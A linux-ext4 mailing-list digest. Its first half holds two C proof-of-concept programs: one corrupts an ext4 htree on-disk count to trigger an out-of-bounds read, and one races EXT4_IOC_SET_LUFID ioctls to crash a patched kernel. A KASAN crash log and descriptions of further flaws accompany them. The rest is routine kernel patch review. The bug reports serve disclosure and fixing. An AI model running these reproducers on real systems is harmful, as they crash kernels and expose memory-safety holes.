"mkfs.ext4 -F -O metadata_csum,dir_index,^has_journal "
"-b %d %s 2>/dev/null", BLCK_SIZE, IMG_PATH);
if (system(cmd) != 0) { fprintf(stderr, "mkfs failed\n"); return 1; }
/* Setup loop device */
printf("[*] Setting up loop...\n");
snprintf(cmd, sizeof(cmd), "losetup -f %s 2>/dev/null && "
"losetup -j %s | head -1 | cut -d: -f1", IMG_PATH, IMG_PATH);
FILE *fp = popen(cmd, "r");
if (fp) {
if (fgets(loop_dev, sizeof(loop_dev), fp)) {
char *nl = strchr(loop_dev, '\n');
if (nl) *nl = '\0';
}
pclose(fp);
}
if (!strlen(loop_dev)) { fprintf(stderr, "loop setup failed\n");
return 1; }
printf("[*] Loop device: %s\n", loop_dev);
/* Mount and create htree directory with 800 files */
printf("[*] Mounting and creating htree directory...\n");
if (mount(loop_dev, MNT_PATH, "ext4", 0, NULL) < 0) {
perror("mount"); return 1;
}
mkdir(MNT_PATH "/dir", 0755);
for (int i = 0; i < 800; i++) {
char name[64];
snprintf(name, sizeof(name), MNT_PATH "/dir/file_%04d", i);
close(open(name, O_CREAT | O_WRONLY, 0644));
}
printf("[*] Unmounting to corrupt on-disk data...\n");
umount(MNT_PATH);
/*
* Corrupt the dx_countlimit count field.
* The htree root block is block 0 of the directory inode.
* dx_countlimit is at offset 8 in the INDEX-type dx block:
* struct dx_countlimit { __le16 limit; __le16 count; };
* We set count = 0xFFFF (65535) to trigger massive OOB read.
*/
printf("[*] Corrupting dx_countlimit.count in block 0...\n");
img_fd = open(IMG_PATH, O_RDWR);
if (img_fd < 0) { perror("open image"); return 1; }
memset(buf, 0, BLCK_SIZE);
/* Read block 0 of the directory inode. Directory inode is typically
* inode #2 on a freshly formatted ext4. For simplicity we scan for
* the INDEX signature (0x0A) at dx_root_info.dx_magic_offset. */
/* Seek to block group 0's inode table — inode #2 is at offset
* (2-1)*256 = 256 bytes into the inode table. The inode table starts
* at block (superblock.s_first_ino_blocks + 1) or similar.
* For standard ext4 with 4K blocks: inode table at block 1.
* inode #2 at block 1 offset 256. i_block[0] gives the dir block. */
unsigned char inode_buf[256];
lseek(img_fd, BLCK_SIZE + 256, SEEK_SET); /* inode #2 */
read(img_fd, inode_buf, 256);
uint32_t dir_block = inode_buf[40] | (inode_buf[41]<<8) |
(inode_buf[42]<<16) | (inode_buf[43]<<24);
printf("[*] Directory root block: %u\n", dir_block);
/* Read the dx root block, corrupt count at offset 10 (limit at 8,
count at 10) */
lseek(img_fd, dir_block * BLCK_SIZE, SEEK_SET);
read(img_fd, buf, BLCK_SIZE);
uint16_t *count_ptr = (uint16_t *)(buf + 10);
printf("[*] Original count: %u, setting to 65535\n", *count_ptr);
*count_ptr = 0xFFFF;
lseek(img_fd, dir_block * BLCK_SIZE, SEEK_SET);
write(img_fd, buf, BLCK_SIZE);
fsync(img_fd);
close(img_fd);
/* Remount and trigger the bug by reading the directory */
printf("[*] Remounting and triggering via getdents64...\n");
if (mount(loop_dev, MNT_PATH, "ext4", 0, NULL) < 0) {
perror("remount"); return 1;
}
/* ls triggers ext4_readdir → ext4_htree_fill_tree → dx_probe →
csum verify */
system("ls " MNT_PATH "/dir > /dev/null 2>&1");
printf("[*] Done — check dmesg for KASAN report\n");
umount(MNT_PATH);
snprintf(cmd, sizeof(cmd), "losetup -d %s 2>/dev/null", loop_dev);
system(cmd);
return 0;
}
^ permalink raw reply
* Re: [PATCH v3 10/10] ext4: Add EXT4_IOC_SET_LUFID ioctl for setting LUFID on directory entries
From: XIAO WU @ 2026-06-22 17:21 UTC (permalink / raw)
To: Artem Blagodarenko, linux-ext4; +Cc: adilger.kernel, Andreas Dilger
In-Reply-To: <20260619191022.27008-11-ablagodarenko@thelustrecollective.com>
Hi Artem,
I came across the Sashiko AI review [1] of this patch and was able to
reproduce a kernel crash triggered by a race condition in
ext4_dirdata_set_lufid(). I wanted to share the evidence in case it's
helpful.
The core issue is that EXT4_I(inode)->i_dirdata is set to a
stack-local pointer without locking the target inode:
> +static int ext4_dirdata_set_lufid(struct inode *dir,
> + const char *name, int namelen,
> + struct ext4_dentry_param *edp)
> +{
> ...
> + EXT4_I(inode)->i_dirdata = edp;
The function locks the parent directory (inode_lock(dir)), but does NOT
lock the target inode. If two threads operate on different hardlinks
to the *same* inode (in different directories), they race to overwrite
inode->i_dirdata with each other's stack-local edp pointers. The
winner's stack pointer is later consumed through ext4_add_entry() →
ext4_lookup() → ext4_dentry_get_fid(), reading from a stale or
overwritten stack frame.
With KASAN enabled this manifests as a null-ptr-deref because KASAN
poisons freed stack memory.
[Reproduction]
The PoC creates two subdirectories (/mnt/test/da and /mnt/test/db),
hardlinks the same file into both, then runs 8 child processes that
hammer EXT4_IOC_SET_LUFID on the two directories simultaneously via
ioctl(). Each child is pinned to a specific CPU to maximize the race
window. The kernel panics within a few seconds.
[Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]
Oops: general protection fault, probably for non-canonical address
0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
RIP: 0010:ext4_dirdata_set_lufid+0x3e8/0xb00
RAX: dffffc0000000000 RBX: 0000000000000000
...
Call Trace:
<TASK>
ext4_ioctl_set_lufid+0x2d9/0x350
__ext4_ioctl+0x1d2/0x43c0
__x64_sys_ioctl+0x193/0x210
do_syscall_64+0x129/0x850
entry_SYSCALL_64_after_hwframe+0x77/0x7f
</TASK>
The same crash was independently hit by a second thread at [#2],
confirming the race condition.
Additionally, the Sashiko review [1] noted a few other issues in this
patch that may be worth checking:
- The ioctl does not reject '.' and '..' — modifying these special
entries via EXT4_IOC_SET_LUFID would corrupt the directory layout.
- The ddh_length computation in ext4_find_dest_de() appears to
exclude the header size (1 byte), which can cause the header and
data insertion to overflow by one byte into the adjacent directory
entry when (fname_len + esl_data_len) % 4 == 0.
- The handler calls mnt_want_write_file() but omits an explicit
inode_permission(dir, MAY_WRITE) check, which may allow an
unprivileged user with read-only access to the directory to
modify directory entries.
The PoC is attached below. It compiles with:
gcc -o poc poc.c -static
[1]
https://sashiko.dev/#/patchset/20260619191022.27008-1-ablagodarenko%40thelustrecollective.com
(Sashiko AI code review — "Dangling Pointer", Severity: Critical)
Thanks,
XIAO
// PoC: race on EXT4_I(inode)->i_dirdata via EXT4_IOC_SET_LUFID
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <linux/loop.h>
#include <linux/fs.h>
struct ext4_set_lufid {
uint8_t esl_name_len;
char esl_name[256];
uint8_t esl_data_len;
char esl_data[255];
};
#define EXT4_IOC_SET_LUFID _IOW('f', 47, struct ext4_set_lufid)
#define MNT "/mnt/test"
int main(void)
{
int fd, ret;
setvbuf(stdout, NULL, _IONBF, 0);
printf("=== EXT4_IOC_SET_LUFID PoC ===\n\n");
/* Setup loopback ext4 filesystem */
system("umount -l /mnt/test 2>/dev/null; losetup -d /dev/loop0
2>/dev/null; true");
system("rm -rf /mnt/test /tmp/img 2>/dev/null");
mkdir(MNT, 0755);
system("dd if=/dev/zero of=/tmp/img bs=1M count=64 2>/dev/null");
system("losetup /dev/loop0 /tmp/img 2>/dev/null");
system("mkfs.ext4 -F -b 1024 -O ^metadata_csum,^64bit,^flex_bg
/dev/loop0 2>/dev/null");
if (mount("/dev/loop0", MNT, "ext4", 0, NULL) != 0) {
printf("Mount failed\n"); return 1;
}
/* Create target file with two hardlinks in different directories */
mkdir(MNT "/da", 0755);
mkdir(MNT "/db", 0755);
close(open(MNT "/t", O_CREAT|O_WRONLY, 0644));
link(MNT "/t", MNT "/da/t");
link(MNT "/t", MNT "/db/t");
printf("Racing EXT4_IOC_SET_LUFID on hardlinks...\n");
for (int r = 0; r < 20; r++) {
pid_t kids[8];
for (int i = 0; i < 8; i++) {
kids[i] = fork();
if (kids[i] == 0) {
/* Half target /da, half target /db — same inode */
const char *dir = (i < 4) ? MNT "/da" : MNT "/db";
cpu_set_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(i % 2, &cpuset);
sched_setaffinity(0, sizeof(cpu_set_t), &cpuset);
for (int j = 0; j < 5000; j++) {
struct ext4_set_lufid l = {0};
l.esl_name_len = 2;
memcpy(l.esl_name, "t\0", 2);
l.esl_data_len = 5;
memcpy(l.esl_data, "ABCDE", 5);
int f = open(dir, O_RDONLY);
if (f >= 0) {
ioctl(f, EXT4_IOC_SET_LUFID, &l);
close(f);
}
}
_exit(0);
}
}
for (int i = 0; i < 8; i++) {
int ws;
waitpid(kids[i], &ws, 0);
}
printf("."); fflush(stdout);
}
printf("\n");
printf("\n=== dmesg ===\n"); fflush(stdout);
system("dmesg | grep -iE 'KASAN|BUG:|Call Trace|general protection'
| tail -40");
umount(MNT);
system("losetup -d /dev/loop0 2>/dev/null");
printf("Done.\n");
return 0;
}
^ permalink raw reply
* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Steven Rostedt @ 2026-06-22 16:51 UTC (permalink / raw)
To: Randy Dunlap
Cc: Peter Zijlstra, linux-kernel, linux-trace-kernel,
Masami Hiramatsu, Mark Rutland, Mathieu Desnoyers, Andrew Morton,
Linus Torvalds, Sebastian Andrzej Siewior, John Ogness,
Thomas Gleixner, Julia Lawall, Yury Norov, linux-doc,
linux-kbuild, linuxppc-dev, dri-devel, linux-stm32,
linux-arm-kernel, linux-rdma, linux-usb, linux-ext4, linux-nfs,
kvm, intel-gfx
In-Reply-To: <08b3c961-18bb-43d9-8d7f-8a87bcad0afa@infradead.org>
On Mon, 22 Jun 2026 09:40:45 -0700
Randy Dunlap <rdunlap@infradead.org> wrote:
> > Did you forget your C 101 class? If you use a function, you gotta
> > include the relevant header.
>
> Also item #1 in Documentation/process/submit-checklist.rst.
What is that? Remove all trace_printk()s before you submit?
Because that is what you should do. But now you also need to remember
to remove the include <linux/trace_printk.h> too. Or, I guess if
someone uses it a lot, they may just keep it in their files without the
trace_printk()s.
-- Steve
^ permalink raw reply
* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Randy Dunlap @ 2026-06-22 16:40 UTC (permalink / raw)
To: Peter Zijlstra, Steven Rostedt
Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
Julia Lawall, Yury Norov, linux-doc, linux-kbuild, linuxppc-dev,
dri-devel, linux-stm32, linux-arm-kernel, linux-rdma, linux-usb,
linux-ext4, linux-nfs, kvm, intel-gfx
In-Reply-To: <20260622083440.GX49951@noisy.programming.kicks-ass.net>
On 6/22/26 1:34 AM, Peter Zijlstra wrote:
> On Sun, Jun 21, 2026 at 05:34:30AM -0400, Steven Rostedt wrote:
>> There's been complaints about trace_printk() being defined in kernel.h as it
>> can increase the compilation time. As it is only used by some developers for
>> debugging purposes, it should not be in kernel.h causing lots of wasted CPU
>> cycles for those that do not ever care about it.
>>
>> Instead, add a CONFIG_TRACE_PRINTK_DEBUGGING option that developers that do
>> use it can set and not have to always remember to add #include <linux/trace_printk.h>
>> to the files they add trace_printk() while debugging. It also means that
>> those that do not have that config set will not have to worry about wasted
>> CPU cycles as it is only include in the CFLAGS when the option is set, and
>> its completely ignored otherwise.
>
> Did you forget your C 101 class? If you use a function, you gotta
> include the relevant header.
Also item #1 in Documentation/process/submit-checklist.rst.
> You don't see userspace saying: 'Hey, you know what, perhaps we should
> add stdio.h to every other header, just in case someone wants to
> printf()' either.
>
> I really don't understand your argument. Yes, maybe someone will forget
> and then either their editor (if they have a halfway modern setup with
> LSP enabled) or their build will complain, but so what? This is all
> trivial stuff, surely we have more pressing matters to concern outselves
> with?
--
~Randy
^ permalink raw reply
* Re: [PATCH RFC v2 08/18] fs: add dedicated block device open helpers for filesystems
From: Jan Kara @ 2026-06-22 16:34 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <xlfnmwv2upjia6ozd4z5l5icaewor4a6cgkafnigulndzmt6r7@rhay3h3wablo>
On Mon 22-06-26 18:28:50, Jan Kara wrote:
> On Tue 16-06-26 16:08:24, Christian Brauner wrote:
> > Add fs_bdev_file_open_by_{dev,path}() and fs_bdev_file_release(). They
> > open the device with fs_holder_ops and register a claim in the
> > device-to-superblock table. Claims on the same (device, superblock)
> > pair share one entry, so when a filesystem claims a device it already
> > uses (xfs with its log on the data device), no second entry is added
> > and each superblock will be acted on once.
> >
> > The holder argument remains purely the block layer's exclusivity token:
> > a superblock, or a file_system_type for a device shared by several
> > superblocks of that type. The shared case only becomes usable once the
> > fs_holder_ops callbacks resolve superblocks through the table instead
> > of bdev->bd_holder.
> >
> > Convert the main device, setup_bdev_super() and kill_block_super(),
> > over: the open finds the entry registered by sget_fc() and claims it
> > again. cramfs and romfs bypass kill_block_super() so they can handle
> > MTD mounts and release the main device with a plain bdev_fput(), which
> > would leave the claim behind: the (dev, sb) entry would never be
> > unregistered and the passive reference it holds would keep the
> > superblock alive forever. Convert their release paths in the same
> > step.
> >
> > The frozen-device check stays in setup_bdev_super() for the primary
> > device and is added to fs_bdev_register() for new claims, i.e. every
> > additional device a filesystem opens through the helpers. Only a
> > (device, superblock) pair the superblock claimed earlier may be
> > reopened while frozen (xfs with its log on the data device): the freeze
> > already covers that superblock through the existing claim, so nothing
> > escapes it. Without the setup_bdev_super() check a device frozen before
> > the mount even started (dm lock_fs, loop) could be mounted and written
> > to (journal replay) under an active freeze, because the primary open
> > reuses the entry registered by sget_fc() and never takes the new-claim
> > path.
> >
> > Both checks read bd_fsfreeze_count only after the entry is published
> > (by sget_fc() for the primary, by fs_bdev_register() for new claims)
> > and pair with bdev_freeze() incrementing the count before walking the
> > table: either the mount sees the elevated freeze count and fails with
> > EBUSY, or the freeze finds the published entry and converges once
> > SB_BORN is set.
> >
> > Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
...
> > +/**
> > + * fs_bdev_file_release - release a block device claimed for a superblock
> > + * @bdev_file: file returned by fs_bdev_file_open_by_{dev,path}()
> > + * @sb: superblock the device was claimed for
> > + *
> > + * Drop one claim on the {dev, @sb} entry; the last claim unregisters it (a
> > + * pinning cursor defers the actual unlink). Then close the block device.
> > + */
> > +void fs_bdev_file_release(struct file *bdev_file, struct super_block *sb)
> > +{
> > + dev_t dev = file_bdev(bdev_file)->bd_dev;
> > + struct super_dev *sb_dev;
> > +
> > + rcu_read_lock();
> > + sb_dev = super_dev_lookup(dev, sb);
> > + rcu_read_unlock();
> > + super_dev_put(sb_dev);
> > + bdev_fput(bdev_file);
> > +}
> > +EXPORT_SYMBOL_GPL(fs_bdev_file_release);
>
> Why don't you use sb->s_super_dev in this function?
Nevermind, I've realized sb can hold multiple bdevs so this is really
needed.
I'd still prefer the __free handling in fs_bdev_register() sorted out but
regardless feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH RFC v2 08/18] fs: add dedicated block device open helpers for filesystems
From: Jan Kara @ 2026-06-22 16:28 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260616-work-super-bdev_holder_global-v2-8-7df6b864028e@kernel.org>
On Tue 16-06-26 16:08:24, Christian Brauner wrote:
> Add fs_bdev_file_open_by_{dev,path}() and fs_bdev_file_release(). They
> open the device with fs_holder_ops and register a claim in the
> device-to-superblock table. Claims on the same (device, superblock)
> pair share one entry, so when a filesystem claims a device it already
> uses (xfs with its log on the data device), no second entry is added
> and each superblock will be acted on once.
>
> The holder argument remains purely the block layer's exclusivity token:
> a superblock, or a file_system_type for a device shared by several
> superblocks of that type. The shared case only becomes usable once the
> fs_holder_ops callbacks resolve superblocks through the table instead
> of bdev->bd_holder.
>
> Convert the main device, setup_bdev_super() and kill_block_super(),
> over: the open finds the entry registered by sget_fc() and claims it
> again. cramfs and romfs bypass kill_block_super() so they can handle
> MTD mounts and release the main device with a plain bdev_fput(), which
> would leave the claim behind: the (dev, sb) entry would never be
> unregistered and the passive reference it holds would keep the
> superblock alive forever. Convert their release paths in the same
> step.
>
> The frozen-device check stays in setup_bdev_super() for the primary
> device and is added to fs_bdev_register() for new claims, i.e. every
> additional device a filesystem opens through the helpers. Only a
> (device, superblock) pair the superblock claimed earlier may be
> reopened while frozen (xfs with its log on the data device): the freeze
> already covers that superblock through the existing claim, so nothing
> escapes it. Without the setup_bdev_super() check a device frozen before
> the mount even started (dm lock_fs, loop) could be mounted and written
> to (journal replay) under an active freeze, because the primary open
> reuses the entry registered by sget_fc() and never takes the new-claim
> path.
>
> Both checks read bd_fsfreeze_count only after the entry is published
> (by sget_fc() for the primary, by fs_bdev_register() for new claims)
> and pair with bdev_freeze() incrementing the count before walking the
> table: either the mount sees the elevated freeze count and fails with
> EBUSY, or the freeze finds the published entry and converges once
> SB_BORN is set.
>
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
...
> +static int fs_bdev_register(struct file *bdev_file, struct super_block *sb)
> +{
> + struct super_dev *sb_dev __free(kfree) = NULL;
Frankly I find the use of __free on sb_dev more confusing than helping in
this function. If you didn't use it, you could remove the somewhat
confusing retain_and_null_ptr() calls below, remove this initialization and
just put one kfree() into the error handling branch when super_dev_insert()
fails...
> + dev_t dev = file_bdev(bdev_file)->bd_dev;
> + int err;
> +
> + scoped_guard(rcu) {
> + sb_dev = super_dev_lookup(dev, sb);
> + if (sb_dev && refcount_inc_not_zero(&sb_dev->sd_ref)) {
> + retain_and_null_ptr(sb_dev);
> + return 0;
> + }
> + }
> +
> + sb_dev = super_dev_alloc(dev, sb);
> + if (!sb_dev)
> + return -ENOMEM;
> +
> + err = super_dev_insert(sb_dev);
> + if (err)
> + return err;
> +
> + /* Publish the entry before reading the count; pairs with bdev_freeze(). */
> + smp_mb();
> + if (atomic_read(&file_bdev(bdev_file)->bd_fsfreeze_count) > 0) {
> + err = -EBUSY;
> + super_dev_put(sb_dev);
> + }
> +
> + retain_and_null_ptr(sb_dev);
> + return err;
> +}
...
> +/**
> + * fs_bdev_file_release - release a block device claimed for a superblock
> + * @bdev_file: file returned by fs_bdev_file_open_by_{dev,path}()
> + * @sb: superblock the device was claimed for
> + *
> + * Drop one claim on the {dev, @sb} entry; the last claim unregisters it (a
> + * pinning cursor defers the actual unlink). Then close the block device.
> + */
> +void fs_bdev_file_release(struct file *bdev_file, struct super_block *sb)
> +{
> + dev_t dev = file_bdev(bdev_file)->bd_dev;
> + struct super_dev *sb_dev;
> +
> + rcu_read_lock();
> + sb_dev = super_dev_lookup(dev, sb);
> + rcu_read_unlock();
> + super_dev_put(sb_dev);
> + bdev_fput(bdev_file);
> +}
> +EXPORT_SYMBOL_GPL(fs_bdev_file_release);
Why don't you use sb->s_super_dev in this function?
Otherwise the patch looks good to me.
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH RFC v2 07/18] fs: maintain a global device-to-superblock table
From: Jan Kara @ 2026-06-22 15:59 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260616-work-super-bdev_holder_global-v2-7-7df6b864028e@kernel.org>
On Tue 16-06-26 16:08:23, Christian Brauner wrote:
> fs_holder_ops recovers the owning superblock from bdev->bd_holder, which
> forces the holder to be exactly one superblock and prevents several
> superblocks from sharing one block device. That's what erofs is doing.
>
> As a first step introduce a global dev_t-keyed rhltable mapping each
> device to the superblock(s) using it. The entry is preallocated in
> alloc_super() and registered under sb->s_dev by the set callback through
> set_anon_super() and set_bdev_super(), the two helpers every set
> callback assigns s_dev through. Registration is the final fallible act
> of a set callback, so an insert failure unwinds through sget_fc()'s
> existing set-failure path: the fs_context keeps ownership of s_fs_info
> and the callers' error paths stay correct. set_anon_super() releases
> the anonymous dev it allocated when registration fails. Unwinding
> through deactivate_locked_super() instead would run kill_sb() and free
> s_fs_info behind the caller's back: nfs and ceph free that object
> through a local pointer when sget_fc() fails and would double-free.
>
> The superblock stashes the entry in sb->s_super_dev and
> kill_super_notify() drops the claim through it, so teardown doesn't
> depend on s_dev staying stable; an entry that was never registered is
> freed together with the superblock in destroy_super_work().
>
> Each table entry holds a passive reference (s_passive) on its
> superblock, so the struct stays valid for as long as the entry is
> reachable. Entries are claim-counted through sd_ref: additional claims
> on the same (device, superblock) pair share the entry, and the unlink
> is deferred to the last put, so a later iteration cursor never resumes
> from a removed node.
>
> The table is initialized from mnt_init(): the first superblocks (the
> tmpfs shm mount and rootfs) are created from start_kernel() long before
> any initcall runs, so an initcall would be too late.
>
> The table has no readers yet; the fs_holder_ops callbacks are switched
> over once all devices a filesystem claims are registered.
>
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
Looks good. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/internal.h | 1 +
> fs/namespace.c | 2 +
> fs/super.c | 102 ++++++++++++++++++++++++++++++++++++++++-
> include/linux/fs/super_types.h | 2 +
> 4 files changed, 105 insertions(+), 2 deletions(-)
>
> diff --git a/fs/internal.h b/fs/internal.h
> index d77578d66d42..83eb3e2a0f85 100644
> --- a/fs/internal.h
> +++ b/fs/internal.h
> @@ -137,6 +137,7 @@ extern int reconfigure_super(struct fs_context *);
> extern bool super_trylock_shared(struct super_block *sb);
> struct super_block *user_get_super(dev_t, bool excl);
> void put_super(struct super_block *sb);
> +void __init super_dev_init(void);
> extern bool mount_capable(struct fs_context *);
> int sb_init_dio_done_wq(struct super_block *sb);
>
> diff --git a/fs/namespace.c b/fs/namespace.c
> index 3d5cd5bf3b05..7cef6dae0854 100644
> --- a/fs/namespace.c
> +++ b/fs/namespace.c
> @@ -6262,6 +6262,8 @@ void __init mnt_init(void)
> if (!mount_hashtable || !mountpoint_hashtable)
> panic("Failed to allocate mount hash table\n");
>
> + super_dev_init();
> +
> kernfs_init();
>
> err = sysfs_init();
> diff --git a/fs/super.c b/fs/super.c
> index a771a0ad4c9a..ff5e305d0ab4 100644
> --- a/fs/super.c
> +++ b/fs/super.c
> @@ -24,6 +24,7 @@
> #include <linux/export.h>
> #include <linux/slab.h>
> #include <linux/blkdev.h>
> +#include <linux/rhashtable.h>
> #include <linux/mount.h>
> #include <linux/security.h>
> #include <linux/writeback.h> /* for the emergency remount stuff */
> @@ -272,6 +273,8 @@ static unsigned long super_cache_count(struct shrinker *shrink,
> return total_objects;
> }
>
> +static struct super_dev *super_dev_alloc(dev_t dev, struct super_block *sb);
> +
> static void destroy_super_work(struct work_struct *work)
> {
> struct super_block *s = container_of(work, struct super_block,
> @@ -279,6 +282,8 @@ static void destroy_super_work(struct work_struct *work)
> fsnotify_sb_free(s);
> security_sb_free(s);
> put_user_ns(s->s_user_ns);
> + /* Only an unregistered entry is still owned by the superblock. */
> + kfree(s->s_super_dev);
> kfree(s->s_subtype);
> for (int i = 0; i < SB_FREEZE_LEVELS; i++)
> percpu_free_rwsem(&s->s_writers.rw_sem[i]);
> @@ -392,6 +397,10 @@ static struct super_block *alloc_super(struct file_system_type *type, int flags,
> goto fail;
> if (list_lru_init_memcg(&s->s_inode_lru, s->s_shrink))
> goto fail;
> + s->s_super_dev = super_dev_alloc(0, s);
> + if (!s->s_super_dev)
> + goto fail;
> +
> s->s_min_writeback_pages = MIN_WRITEBACK_PAGES;
> return s;
>
> @@ -421,6 +430,77 @@ void put_super(struct super_block *s)
> }
> }
>
> +struct super_dev {
> + dev_t sd_dev;
> + struct super_block *sd_sb;
> + refcount_t sd_ref;
> + struct rhlist_head sd_node;
> + struct rcu_head sd_rcu;
> +};
> +
> +static struct rhltable super_dev_table;
> +static const struct rhashtable_params super_dev_params = {
> + .key_len = sizeof(dev_t),
> + .key_offset = offsetof(struct super_dev, sd_dev),
> + .head_offset = offsetof(struct super_dev, sd_node),
> +};
> +
> +static struct super_dev *super_dev_alloc(dev_t dev, struct super_block *sb)
> +{
> + struct super_dev *fsd;
> +
> + fsd = kzalloc_obj(*fsd);
> + if (!fsd)
> + return NULL;
> + fsd->sd_dev = dev;
> + fsd->sd_sb = sb;
> + refcount_set(&fsd->sd_ref, 1);
> + return fsd;
> +}
> +
> +static void super_dev_put(struct super_dev *fsd)
> +{
> + /* Unlink only once unpinned, so a cursor never resumes from a removed node. */
> + if (fsd && refcount_dec_and_test(&fsd->sd_ref)) {
> + rhltable_remove(&super_dev_table, &fsd->sd_node, super_dev_params);
> + put_super(fsd->sd_sb);
> + kfree_rcu(fsd, sd_rcu);
> + }
> +}
> +
> +void __init super_dev_init(void)
> +{
> + if (rhltable_init(&super_dev_table, &super_dev_params))
> + panic("VFS: Cannot initialise super_dev_table\n");
> +}
> +
> +static int super_dev_insert(struct super_dev *fsd)
> +{
> + int err;
> +
> + err = rhltable_insert(&super_dev_table, &fsd->sd_node, super_dev_params);
> + if (!err)
> + refcount_inc(&fsd->sd_sb->s_passive);
> + return err;
> +}
> +
> +/* Register @sb under @sb->s_dev as the final fallible act of a set callback. */
> +static int super_dev_register(struct super_block *sb)
> +{
> + struct super_dev *fsd = sb->s_super_dev;
> + int err;
> +
> + lockdep_assert_held(&sb_lock);
> + VFS_WARN_ON_ONCE(!sb->s_dev);
> + VFS_WARN_ON_ONCE(!fsd || fsd->sd_dev);
> +
> + fsd->sd_dev = sb->s_dev;
> + err = super_dev_insert(fsd);
> + if (err)
> + fsd->sd_dev = 0;
> + return err;
> +}
> +
> static void kill_super_notify(struct super_block *sb)
> {
> lockdep_assert_not_held(&sb->s_umount);
> @@ -440,6 +520,12 @@ static void kill_super_notify(struct super_block *sb)
> hlist_del_init(&sb->s_instances);
> spin_unlock(&sb_lock);
>
> + /* Drop sget_fc()'s claim; a never-registered entry stays with the sb. */
> + if (sb->s_super_dev->sd_dev) {
> + super_dev_put(sb->s_super_dev);
> + sb->s_super_dev = NULL;
> + }
> +
> /*
> * Let concurrent mounts know that this thing is really dead.
> * We don't need @sb->s_umount here as every concurrent caller
> @@ -750,6 +836,7 @@ struct super_block *sget_fc(struct fs_context *fc,
> }
> if (!s) {
> spin_unlock(&sb_lock);
> +
> s = alloc_super(fc->fs_type, fc->sb_flags, user_ns);
> if (!s)
> return ERR_PTR(-ENOMEM);
> @@ -759,11 +846,13 @@ struct super_block *sget_fc(struct fs_context *fc,
> s->s_fs_info = fc->s_fs_info;
> err = set(s, fc);
> if (err) {
> + VFS_WARN_ON_ONCE(s->s_super_dev->sd_dev);
> s->s_fs_info = NULL;
> spin_unlock(&sb_lock);
> destroy_unused_super(s);
> return ERR_PTR(err);
> }
> + VFS_WARN_ON_ONCE(!s->s_super_dev->sd_dev);
> fc->s_fs_info = NULL;
> s->s_type = fc->fs_type;
> s->s_iflags |= fc->s_iflags;
> @@ -1217,7 +1306,16 @@ EXPORT_SYMBOL(free_anon_bdev);
>
> int set_anon_super(struct super_block *s, void *data)
> {
> - return get_anon_bdev(&s->s_dev);
> + int error;
> +
> + error = get_anon_bdev(&s->s_dev);
> + if (error)
> + return error;
> +
> + error = super_dev_register(s);
> + if (error)
> + free_anon_bdev(s->s_dev);
> + return error;
> }
> EXPORT_SYMBOL(set_anon_super);
>
> @@ -1303,7 +1401,7 @@ EXPORT_SYMBOL(get_tree_keyed);
> static int set_bdev_super(struct super_block *s, void *data)
> {
> s->s_dev = *(dev_t *)data;
> - return 0;
> + return super_dev_register(s);
> }
>
> static int super_s_dev_set(struct super_block *s, struct fs_context *fc)
> diff --git a/include/linux/fs/super_types.h b/include/linux/fs/super_types.h
> index 68747182abf9..c8172558750f 100644
> --- a/include/linux/fs/super_types.h
> +++ b/include/linux/fs/super_types.h
> @@ -30,6 +30,7 @@ struct mount;
> struct mtd_info;
> struct quotactl_ops;
> struct shrinker;
> +struct super_dev;
> struct unicode_map;
> struct user_namespace;
> struct workqueue_struct;
> @@ -132,6 +133,7 @@ struct super_operations {
> struct super_block {
> struct list_head s_list; /* Keep this first */
> dev_t s_dev; /* search index; _not_ kdev_t */
> + struct super_dev *s_super_dev; /* sget_fc()'s device table claim */
> unsigned char s_blocksize_bits;
> unsigned long s_blocksize;
> loff_t s_maxbytes; /* Max file size */
>
> --
> 2.47.3
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH RFC v2 00/18] fs: support freeze/thaw/mark_dead/sync with shared devices
From: Jan Kara @ 2026-06-22 15:40 UTC (permalink / raw)
To: Christian Brauner
Cc: Jan Kara, Christoph Hellwig, Jens Axboe, Alexander Viro,
linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
linux-xfs, Chris Mason, David Sterba, linux-btrfs,
Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs, syzbot
In-Reply-To: <20260616-work-super-bdev_holder_global-v2-0-7df6b864028e@kernel.org>
